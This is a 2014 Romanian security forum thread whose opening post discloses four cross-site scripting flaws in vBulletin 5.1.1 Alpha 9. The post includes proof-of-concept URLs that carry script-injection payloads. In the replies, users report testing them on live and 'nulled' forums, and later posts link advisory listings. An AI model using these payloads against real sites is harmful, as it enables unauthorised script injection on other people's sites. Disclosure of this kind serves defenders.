Nytro Posted April 18, 2014 Report Share Posted April 18, 2014 Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilitiesAuthors: Romanian Security TeamWebsite: https://rstforums.com/forum/Date published: 19 April 2014Software: vBulletinVersion: 5.1.1 Alpha 9[XSS] Random topic- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//[XSS] New private message- https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>[XSS] View PM: you must know or bruteforce private message ID (830372)- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//[DOM XSS] Help- https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>(c) Romanian Security Team 2014 Quote Link to comment Share on other sites More sharing options...
.Breacker Posted April 19, 2014 Report Share Posted April 19, 2014 Func?ioneaz?,l-am testat pe un forum . Quote Link to comment Share on other sites More sharing options...
Nytro Posted April 19, 2014 Author Report Share Posted April 19, 2014 Packetstorm: vBulletin 5.1 Cross Site Scripting ? Packet Storm Quote Link to comment Share on other sites More sharing options...
TheGeneral Posted April 19, 2014 Report Share Posted April 19, 2014 L-am testat pe 7 forum-uri si nu merge Quote Link to comment Share on other sites More sharing options...
sensi Posted April 19, 2014 Report Share Posted April 19, 2014 (edited) Felicitari baieti! +1 pentru RST Trist ca doar la topicurile de cacat sunt 100 de pagini si 145.656.32543,21 de reply-uri...//Esti sigur ca ai testat pe versiunea vBulletin 5.1? Edited April 19, 2014 by sensi Quote Link to comment Share on other sites More sharing options...
TheGeneral Posted April 19, 2014 Report Share Posted April 19, 2014 Doar pe 4.2.0 si 4.2.2 ....Ce greseala de copil facui Quote Link to comment Share on other sites More sharing options...
Castiel Posted April 19, 2014 Report Share Posted April 19, 2014 Am testat pe o versiune "nulled" merge ! +1 RST .Comunitatea asta ajunge tot mai mare . Quote Link to comment Share on other sites More sharing options...
BadPorn Posted April 20, 2014 Report Share Posted April 20, 2014 Nu conteaza cate comunitati de hacking o sa apara peste noapte! RST e doar una!Bravo! Quote Link to comment Share on other sites More sharing options...
Aerosol Posted April 21, 2014 Report Share Posted April 21, 2014 Foarte bine Testat pe multe forumuri ! Quote Link to comment Share on other sites More sharing options...
Nytro Posted April 22, 2014 Author Report Share Posted April 22, 2014 SecurityFocus: vBulletin Multiple Cross Site Scripting VulnerabilitiesIBM ISS: ISS X-Force Database: vbulletin-multiple-scripts-xss(92664): vBulletin multiple scripts cross-site scriptingSCIP: vBulletin up to 5.1.1 Alpha 9 cross site scriptingBoschetarii de la exploit-db inca nu l-au bagat. Sa ii anunte cineva ca a trecut Pastele. Quote Link to comment Share on other sites More sharing options...